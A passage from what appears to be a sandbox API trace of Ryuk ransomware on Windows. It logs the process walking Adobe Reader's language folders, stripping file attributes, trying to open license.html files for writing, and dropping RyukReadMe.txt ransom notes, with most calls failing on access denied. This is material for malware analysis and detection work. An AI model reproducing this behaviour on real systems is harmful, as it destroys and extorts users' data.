(hObject=0xffffffffffffffff) returned 0 [0138.396] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.397] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.397] SetLastError (dwErrCode=0x0) [0138.397] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.397] GetLastError () returned 0x5 [0138.397] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.397] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.397] SetLastError (dwErrCode=0x0) [0138.397] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.397] GetLastError () returned 0x5 [0138.397] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.397] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.397] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.397] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.397] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.397] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.398] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\license.html", dwFileAttributes=0x80) returned 0 [0138.398] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nld\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.398] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.398] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.398] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.398] SetLastError (dwErrCode=0x0) [0138.398] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nld\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.398] GetLastError () returned 0x5 [0138.398] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.398] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.398] SetLastError (dwErrCode=0x0) [0138.398] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.398] GetLastError () returned 0x5 [0138.398] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.398] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.399] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.399] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.399] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.399] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.399] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\license.html", dwFileAttributes=0x80) returned 0 [0138.399] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.399] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.399] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.399] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.399] SetLastError (dwErrCode=0x0) [0138.399] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.399] GetLastError () returned 0x5 [0138.399] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.400] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.400] SetLastError (dwErrCode=0x0) [0138.400] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.400] GetLastError () returned 0x5 [0138.400] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.400] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.400] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.400] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.401] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.401] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.401] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\license.html", dwFileAttributes=0x80) returned 0 [0138.401] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\pol\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.401] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.401] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.401] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.401] SetLastError (dwErrCode=0x0) [0138.401] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\pol\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.401] GetLastError () returned 0x5 [0138.401] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.401] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.401] SetLastError (dwErrCode=0x0) [0138.401] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.402] GetLastError () returned 0x5 [0138.402] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.402] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.402] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.402] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.402] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.402] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.403] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\license.html", dwFileAttributes=0x80) returned 0 [0138.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ptb\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.403] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.403] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.403] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.403] SetLastError (dwErrCode=0x0) [0138.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ptb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.403] GetLastError () returned 0x5 [0138.403] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.403] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.403] SetLastError (dwErrCode=0x0) [0138.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.403] GetLastError () returned 0x5 [0138.403] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.403] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.403] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.404] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.404] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.404] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.404] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\license.html", dwFileAttributes=0x80) returned 0 [0138.404] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rum\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.405] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.405] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.405] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.405] SetLastError (dwErrCode=0x0) [0138.405] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rum\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.405] GetLastError () returned 0x5 [0138.405] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.405] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.405] SetLastError (dwErrCode=0x0) [0138.405] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.405] GetLastError () returned 0x5 [0138.405] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.405] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.405] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.406] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.406] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.406] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.406] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\license.html", dwFileAttributes=0x80) returned 0 [0138.406] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rus\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.406] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.406] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.407] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.407] SetLastError (dwErrCode=0x0) [0138.407] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rus\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.407] GetLastError () returned 0x5 [0138.407] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.407] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.407] SetLastError (dwErrCode=0x0) [0138.407] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.407] GetLastError () returned 0x5 [0138.407] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.407] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.407] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.407] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.407] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.407] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.408] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\license.html", dwFileAttributes=0x80) returned 0 [0138.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sky\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.408] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.408] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.408] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.408] SetLastError (dwErrCode=0x0) [0138.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sky\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.408] GetLastError () returned 0x5 [0138.408] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.408] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.408] SetLastError (dwErrCode=0x0) [0138.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.408] GetLastError () returned 0x5 [0138.408] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.408] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.408] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.409] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.409] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.409] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.409] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\license.html", dwFileAttributes=0x80) returned 0 [0138.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\slv\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.410] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.410] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.410] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.410] SetLastError (dwErrCode=0x0) [0138.410] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\slv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.410] GetLastError () returned 0x5 [0138.410] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.410] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.410] SetLastError (dwErrCode=0x0) [0138.410] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.410] GetLastError () returned 0x5 [0138.410] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.410] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.410] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.410] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.410] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.411] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.411] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\license.html", dwFileAttributes=0x80) returned 0 [0138.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\suo\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.411] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.411] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.411] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.411] SetLastError (dwErrCode=0x0) [0138.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\suo\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.411] GetLastError () returned 0x5 [0138.411] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, 